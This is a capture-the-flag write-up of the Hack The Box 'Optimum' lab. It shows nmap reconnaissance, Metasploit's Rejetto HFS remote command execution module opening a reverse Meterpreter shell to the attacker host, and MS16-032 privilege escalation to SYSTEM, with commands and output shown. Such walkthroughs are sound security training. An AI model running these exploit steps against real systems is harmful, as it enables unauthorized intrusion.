Recon
scan nmap
With nmap
we found only one open port (80). We identify a webserver.
1
2
3
4
5
6
7
8
|
# basic scan
nmap -sC -sV -p- -T5 10.10.10.8
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
|
Website
We navigate on the website and, like identified by the nmap scan, we found a HFS (HttpFileServer) server version 2.3
Vulnerabilities
We search for vulnerabilities on exploitdb or metasploit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
# exploitdb
searchsploit HFS 2.3
HFS (HTTP File Server) 2.3.x - Remote Command Execution
# msfconsole
msf6 > search HFS 2.3
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/git_client_command_exec 2014-12-18 excellent No Malicious Git and Mercurial HTTP Server For CVE-2014-9390
1 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
|
We find a well known vulnerability: rejetto_hfs_exec
. Let’s try to get an access to the server !
Exploit
Entry point
We start the rejetto_hfs_exec
module and run the exploit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.16.6:4444
[*] Using URL: http://10.10.16.6:8080/3D77WCI2aRHJnkl
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /3D77WCI2aRHJnkl
[*] Sending stage (175686 bytes) to 10.10.10.8
[*] Meterpreter session 3 opened (10.10.16.6:4444 -> 10.10.10.8:49213) at 2022-07-24 23:52:26 +0200
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\YSDfhnfRWto.vbs' on the target
C:\Users\kostas\Desktop> powershell.exe -c "whoami"
optimum\kostas
|
We are in ! We are connected with the user kostas
. We can now get the user flag! Now we have to do a privesc to get the admin flag.
We first check system information with the sysinfo
command.
1
2
3
4
5
6
7
8
|
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows
|
This is a Windows Server 2012. With some research we find the CVE-2016-0099
that allows a connected user to privesc. We search first for a metasploit module.
privesc
1
2
3
4
5
6
7
8
|
msf6 > search CVE-2016-0099
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation
|
There are a module let’s run the exploit ! We first background our first sessions.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
# create a session
meterpreter > background
# check for our session
msf6 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows OPTIMUM\kostas @ OPTIMUM 10.10.16.6:4445 -> 10.10.10.8:49426 (10.10.10.8)
msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
# configure options, dont forget to point to our session
msf6 > set session <ID session>
msf6 > exploit
C:\Users\kostas\Desktop>whoami
whoami
nt authority\system
|
The privesc works ! We are now system owner :)
Easy, External, HFS, Python, Penetration Tester Level 2, OS Command Injection, CVE-2014-6287, A03:2021-Injection, Network, CVE Exploitation, Public Vulnerabilities